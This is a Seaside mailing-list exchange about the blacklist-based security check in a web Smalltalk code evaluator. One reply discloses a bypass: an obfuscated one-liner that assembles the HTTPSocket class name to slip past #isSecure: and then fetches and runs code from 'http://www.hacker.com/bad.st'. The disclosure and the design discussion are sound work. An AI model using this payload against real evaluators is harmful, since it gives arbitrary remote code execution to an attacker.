Hi,
Maybe a whitelist approach would be better than the black list used now? There are so many ways that it is virtually impossible to write a complete black list.
It took me a while, but I finally managed to browse arbitrary code in the image, including the blacklist (implemented by #isSecure:). Knowing how this method is implemented makes it pretty easy to come up with a new exploit:
(nil environment at: ('https' asUppercase , 'ocket') asSymbol) httpFileIn: 'http://www.hacker.com/bad.st'
This one allows you to load and run arbitrary code.
HTH,
Adrian
On Jan 12, 2010, at 10:12 , Lukas Renggli wrote:
>> could they use your trick with using the debugger to interpret bytecode you did years ago.
>> Yes, that would make it slightly more secure, because one could also
> check also the calls within the code and the receivers and arguments.
> As with all the previous improvements, this will just make it slightly
> more time consuming to find a working exploit. A highly reflective and
> unsecured system like Smalltalk cannot be protected like that. If the
> language doesn't provide the infrastructure to be secure (for example
> through immutable objects, special execution environments, etc.) this
> is not reasonably possible
>> Lukas
>> --
> Lukas Renggli
>http://www.lukas-renggli.ch> _______________________________________________
> seaside mailing list
>seaside at lists.squeakfoundation.org>http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside